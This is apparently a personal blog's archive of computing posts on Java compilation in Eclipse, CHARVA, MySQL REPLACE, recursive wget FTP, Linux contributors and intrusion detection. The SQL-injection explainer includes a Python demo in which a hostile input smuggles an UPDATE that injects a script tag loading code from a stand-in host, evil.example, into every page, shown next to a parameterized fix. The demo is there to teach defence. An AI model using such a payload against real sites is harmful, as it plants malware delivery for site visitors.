Humans are in fact not that different from other species. We make slightly more complex sounds and our territorial behavior is a bit more involved, but to say we’re the crown of creation is rather self-involved. The most that can be said about mankind’s standing in the family of species is that we’re the black sheep, or the obnoxious kid sibling everybody has to put up with, or mom and pop will give them a hairy eyeball.

Category Archives: Computers

Posts on computer science and the web, rants about OSes, window managers, and the like.

Random thought: Windows disproves Darwinism

Microsoft Windows is the unique case that disproves Darwin’s theories of natural evolution and survival of the fittest while at the same time supplying no support for the main theory opposing Darwinism, the so-called Intelligent Design theory. It is obvious that the existence of a system such as Microsoft Windows is the work of a deity. In this case an inherently chaotic and evil one; we usually refer to it as the Devil.

Mmm… wonder if I may be able to do a thesis on that, just wonder if it should be in the religion or computer science department… 😀

CHARVA: A Java Windowing Toolkit for Text Terminals

Looking around for an easy way to create applications with text GUIs for running over SSH terminals, I came across CHARVA. CHARVA’s API mirrors Swing’s; unfortunately it is not built on top of Swing but is a separate copy of it. This forces implementers to import classes from the charva.awt and charvax.swing packages instead of the traditional java.awt and javax.swing ones. However, the result is rather nice, at least if you’re looking to run applications off a server on a simple Point-of-Sale or Point-of-Service (POS) terminal that may not even support graphics.

In my case I’m looking into making a simple app that I can use to keep track of passwords, both when I’m at home (regular Swing) and when I’m away (at work or similar) and only able to access the application via SSH (CHARVA).

For more info, check out CHARVA here: http://www.pitman.co.za/projects/charva/index.html

Compiling to different versions of Java in Eclipse

I’ve just had the rather unsettling experience of trying to deploy a new jar file (one I recompiled after some changes). This file was to be deployed on a rather old setup running Java 1.4.2. On the first try everything broke with the classic “Unsupported major.minor version 50.0”.

So I went back to the drawing board. I installed Java 1.4 and made sure my development Tomcat was running it. Then I did some research and found out how to make Eclipse compile 1.4-compliant code. I started Tomcat again and still got the same error.

Once I figured out what was wrong I realized I was an idiot (Doh!). The error I got wasn’t for any file in the jar I was trying to deploy but for “index_jsp”. The thing is, my Tomcat had compiled my JSPs into class files and never looked at them again until the JSPs were changed. I am sure there are several ways to solve the problem; I just went and deleted the files in the “work” directory (those pertaining to my Context).
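A quick way to see which Java version a given class file was compiled for is to read its header. The following is a minimal sketch in Python, not part of my original fix: the function names are my own, and the table only covers the versions relevant here. Every class file starts with the magic number 0xCAFEBABE followed by the minor and major version, and major version 50 is what Java 6 produces, which is why a Java 1.4 runtime (major version 48) refuses to load it.

```python
import struct

# Class-file major versions and the Java release that produces them by default.
MAJOR_TO_JAVA = {46: "1.2", 47: "1.3", 48: "1.4", 49: "5", 50: "6"}


def class_file_version(data):
    """Return (major, minor) read from the first 8 bytes of a .class file."""
    # Header layout: 4-byte magic, 2-byte minor, 2-byte major, all big-endian.
    magic, minor, major = struct.unpack(">IHH", data[:8])
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    return major, minor


def describe(data):
    """Return a human-readable description of the class file version."""
    major, minor = class_file_version(data)
    java = MAJOR_TO_JAVA.get(major, "unknown")
    return "class file version %d.%d (Java %s)" % (major, minor, java)
```

Calling describe(open(path, "rb").read()) on a suspect file, such as a compiled JSP in Tomcat’s “work” directory, tells you whether it is the stale one.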

Now, on to how to make Eclipse compile projects for a certain Java version.

There are two values you will want to keep track of: the source version and the target version. The source version tells the compiler what version of Java your source code is written in, whereas the target version tells it what version of Java you want your class files to be compatible with.

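If, for instance, you have a project written in Java 1.4 source style but have to run it on Java 5, you’d set the source version to 1.4 and the target to 1.5. You are now compiling Java 1.4 source into Java 5 class files. Unfortunately you’re not able to do the opposite and compile Java 5 source code into Java 1.4 class files: the compiler insists that the target be at least as new as the source. Note that neither setting changes which API you compile against. That is decided by the JRE on the project’s build path, so code compiled with a 1.4 target can still call methods that only exist in Java 5 and then fail at runtime on 1.4.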



Now, in Eclipse you have two settings in three places that control the source and target versions of your compilations. Under Window->Preferences->Java->Compiler (Eclipse 3.4) you’re able to set the versions for the whole IDE.

When you create a new project you’re able to determine what version of Java (source and target) you want, and by right-clicking on a project and choosing Properties->Java Compiler you get the same dialog as before.

You set the overall level in the select box “Compiler compliance level”. Optionally, by unchecking “Use default compliance settings”, you’re able to change the target (“Generated .class files compatibility”) and the source (“Source compatibility”) separately.

If you experience other problems you may want to “clean” your project(s). Cleaning a project means all compiled files are removed and all source files are recompiled (something the IDE will do by itself when you change compilation versions, but if you want to be sure, you can do it manually). This is done by choosing Project->Clean. In the dialog you can choose to clean all projects or just those you select.

SQL-Injections, the two most common types

What are SQL-injections? How can they affect my site? How do they happen and how can I avoid them?

Your site may already be under attack, but the attacker is only using your site to attack your users! This is done using something called SQL-injections.



Since Firefox (2 and 3) and MSIE 7 started using Google’s (and others’) systems for blocking sites that serve harmful web pages, the problem of SQL-injections has been put in the spotlight.

What happens is that an attacker hacks a site by getting their own SQL code executed against the database of the victim system. A system open to SQL-injections may be attacked in basically two ways. In the first, the attacker performs a DoS (denial of service) attack. This could be done by deleting all the tables or doing something else harmful to the site, effectively bringing the whole site down.

The other form of attack that can be performed on systems open to SQL-injections is far sneakier and may not be detected at all by the site owner or the site visitors. This form of attack consists of planting client-side browser code in the database, so that every visitor runs code that infects their computer with malware or viruses. This malicious software may do everything from listening in on traffic between the client (web browser) and bank sites, to connecting the client system to a botnet.
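To make the second kind of attack concrete, here is a minimal sketch in Python using an in-memory SQLite database. Everything in it is made up for illustration: the pages and comments tables, the function names and the evil.example URL. The unsafe function pastes user input straight into the SQL text, so a crafted “author name” can smuggle in an UPDATE that appends a script tag to every page. The safe function passes the input as a bound parameter, which is one common way to avoid the problem.

```python
import sqlite3

# Hypothetical attacker input: closes the INSERT, then appends a script tag
# to every stored page, then comments out the rest of the original statement.
PAYLOAD = ("x'); UPDATE pages SET body = body || "
           "'<script src=\"http://evil.example/x.js\"></script>'; --")


def make_db():
    """Create a tiny example site database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO pages (body) VALUES ('Welcome!')")
    conn.execute("CREATE TABLE comments (author TEXT)")
    return conn


def add_comment_unsafe(conn, author):
    # VULNERABLE: the input becomes part of the SQL text itself.
    conn.executescript(
        "INSERT INTO comments (author) VALUES ('" + author + "');")


def add_comment_safe(conn, author):
    # The input is bound as data and is never parsed as SQL.
    conn.execute("INSERT INTO comments (author) VALUES (?)", (author,))
    conn.commit()


def page_body(conn):
    """Return the body of the single example page."""
    return conn.execute("SELECT body FROM pages").fetchone()[0]
```

After add_comment_unsafe(conn, PAYLOAD) the page body contains the attacker’s script tag, while after add_comment_safe(conn, PAYLOAD) the page is untouched and the payload is merely stored as an odd-looking author name.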

Needless to say, attacks using SQL-injections have become a problem not so much for the owner of the vulnerable site as for the visitors to said site. That said, users of the web should not underestimate the importance of good virus protection, a system update policy and a secure browsing policy.

Since the owner of the vulnerable site won’t notice any deviation from business as usual, and neither will most infected clients, nobody is the wiser to the problem.

This is why Google (and others) have started evaluating (and flagging) sites with bad content, and why Firefox and MSIE (and probably others) have started blocking them.

Search and Replace in MySQL

I’ve come across a problem in one of my projects at work. It consists of searching and replacing data in a MySQL server. The data to be replaced is an old URL used in lots of text fields all over the place. It is the customer’s own site URL, but since they moved, they now want all URLs to point to their new location.

Searching the web and checking the MySQL function reference turns up the following useful function:

REPLACE(str, from_str, to_str)

It would in my case be used like this:

UPDATE myTable SET theTextField = REPLACE(theTextField, 'http://the.old.site', 'http://the.new.site');

myTable is the table containing the data I want to replace, theTextField is the exact field in which this data is located. Obviously “http://the.old.site” is the existing information, that I want to replace, and “http://the.new.site” is the information this string should be replaced with.

Very simple, very elegant (well… if you forget about the site URL in the database in the first place…) Now all I have to do is try it out as well. (Expect more reports on the progress of this work!)
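Before running this against the real server, the statement can be tried out on throwaway data. The sketch below does that in Python with an in-memory SQLite database standing in for MySQL (an assumption on my part; SQLite happens to have a replace() function with the same argument order). The WHERE clause and the helper names are my own additions: the clause restricts the update to rows that actually contain the old URL, so the returned row count means something.

```python
import sqlite3

OLD = "http://the.old.site"
NEW = "http://the.new.site"


def replace_url(conn, old=OLD, new=NEW):
    """Rewrite old to new in myTable.theTextField; return rows changed."""
    cur = conn.execute(
        "UPDATE myTable SET theTextField = replace(theTextField, ?, ?) "
        "WHERE instr(theTextField, ?) > 0",
        (old, new, old),
    )
    conn.commit()
    return cur.rowcount


def demo():
    """Run the replacement on two sample rows and return the outcome."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE myTable (id INTEGER PRIMARY KEY, theTextField TEXT)")
    conn.executemany(
        "INSERT INTO myTable (theTextField) VALUES (?)",
        [("See http://the.old.site/about and http://the.old.site/faq",),
         ("No links here",)],
    )
    changed = replace_url(conn)
    rows = [r[0] for r in
            conn.execute("SELECT theTextField FROM myTable ORDER BY id")]
    return changed, rows
```

Note that every occurrence inside a field is replaced, not just the first, and that the match is case-sensitive, so a stray “HTTP://THE.OLD.SITE” would be left alone.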

Who writes GNU/Linux?

You may have thought GNU/Linux was written by idealistic Unix gurus camped out with a bunch of Jolt Colas in their mom’s basement, but a recent report from the Linux Foundation states the opposite. Between Linux kernel version 2.6.11 in March 2005 and version 2.6.24 (January 2008) the number of developers grew from 483 to 1,057. However, the number of sponsoring companies also grew, from 71 to 186, in the same period.

The major contributors aren’t Mom’s Basement Inc. either. Companies like Novell, IBM, Intel, SGI, Oracle, Google and HP rank among the 20 largest contributors (counted in number of sponsored changes, and here sponsoring means paying employees to program those changes).

This is just the Linux kernel (some 8.5 – 9 million lines of code). However, the Linux kernel in itself is of little use to anyone. You have to add the GNU part of GNU/Linux, consisting of commands like fdisk, aspell, bison, ghostview, and wget, and then you’ll be looking at a much larger number of lines of code. If we go even further and add programs from other projects (like the Mozilla project’s Firefox web browser, or the OpenOffice suite), more lines of code are added (for exact numbers see ohloh.net), and we’re still talking about programs supported by large companies (IBM, Sun, etc.).

To sum it all up: no, GNU/Linux is not being written by enthusiasts in the basement anymore. It’s being written by large corporations for competitive reasons. Hardware manufacturers want to make sure Linux will work on their hardware. Other companies are Linux distribution owners (Red Hat, Novell, MontaVista), use embedded versions of Linux in their consumer hardware (Sony, Nokia, Samsung), or have other reasons (for instance, Volkswagen uses Linux for in-car networking between different components).

FTP with Wget

I’ve just had the total pain of trying to get files (a lot of files, in a lot of directories) via a musty old FTP client (in Linux/Ubuntu).

The problem is that the FTP client (ftp) doesn’t offer much help (like recursive downloads, or mirroring the server-side directory structure on the client side, etc.).

I searched and I found this thread:

http://ubuntuforums.org/archive/index.php/t-378221.html

…with this excellent snippet (posted by Mr. C.):

wget -r --ftp-user YourUSERNAME --ftp-password YourPASS ftp://FTPSITE//dir/'*.html'

If you want to download something other than *.html, you can change the file name pattern as you would expect.

If you want to add more directories, simply add them, but keep track of the number of slashes (“/”). There should be only one after the new directory names (at least that’s how I made it work. It may work wonderfully regardless of the number of slashes, but then again, why challenge fate?)

Happy FTPing!

Open UP

Anybody who ever came into contact with RUP (the name of Rational’s, now IBM’s, version of the Unified Process) may have stumbled upon the web application created to support the process. In there you can find workflows, actor and artifact definitions, templates, etc.

I did come across it, some ten or so years ago. Since then I’ve had the (mis)fortune to work at companies with their own “UP” or what-have-you versions of development processes. So imagine my surprise and delight when I came across an open version of UP (sponsored by the Eclipse project), complete with the web application, the actors, the templates and all.

Using Static Analysis to Create Intrusion Detection

Professor Avishai Wool presents a system that protects GNU/Linux machines from intrusion and malicious program code by using static analysis to produce policy files that define a program’s normal behavior. If the program deviates from said behavior, the system stops it.

Since the analysis is hooked into standard GNU/Linux build tools and uses the source code to derive the policy, the system is said to guarantee zero false positives. A system of this type is said to be able to protect against threats long before traditional anti-virus solutions have categorized them, and with a far smaller penalty to system performance.
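The general idea of a policy that defines normal behavior can be illustrated with a toy example. The sketch below is my own simplification in Python and not the system from the talk: the policy table and the call names are hypothetical. The policy lists, for each system call, which calls may legitimately follow it, and a monitor walks a trace of calls and reports the first one that the policy does not allow, which is the point where a real system would stop the program.

```python
# Hypothetical policy: for each system call, the calls allowed to follow it.
POLICY = {
    "start": {"open"},
    "open": {"read", "close"},
    "read": {"read", "write", "close"},
    "write": {"write", "close"},
    "close": {"open", "exit"},
}


def first_violation(trace, policy=POLICY):
    """Return the index of the first call that breaks the policy, or None."""
    state = "start"
    for index, call in enumerate(trace):
        # A call is legal only if the policy lists it as a successor
        # of the call made just before it.
        if call not in policy.get(state, set()):
            return index
        state = call
    return None
```

A well-behaved trace such as open, read, write, close, exit passes without complaint, whereas a trace that suddenly calls execve after a read is flagged at that call.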

Here’s a list of links for further reading: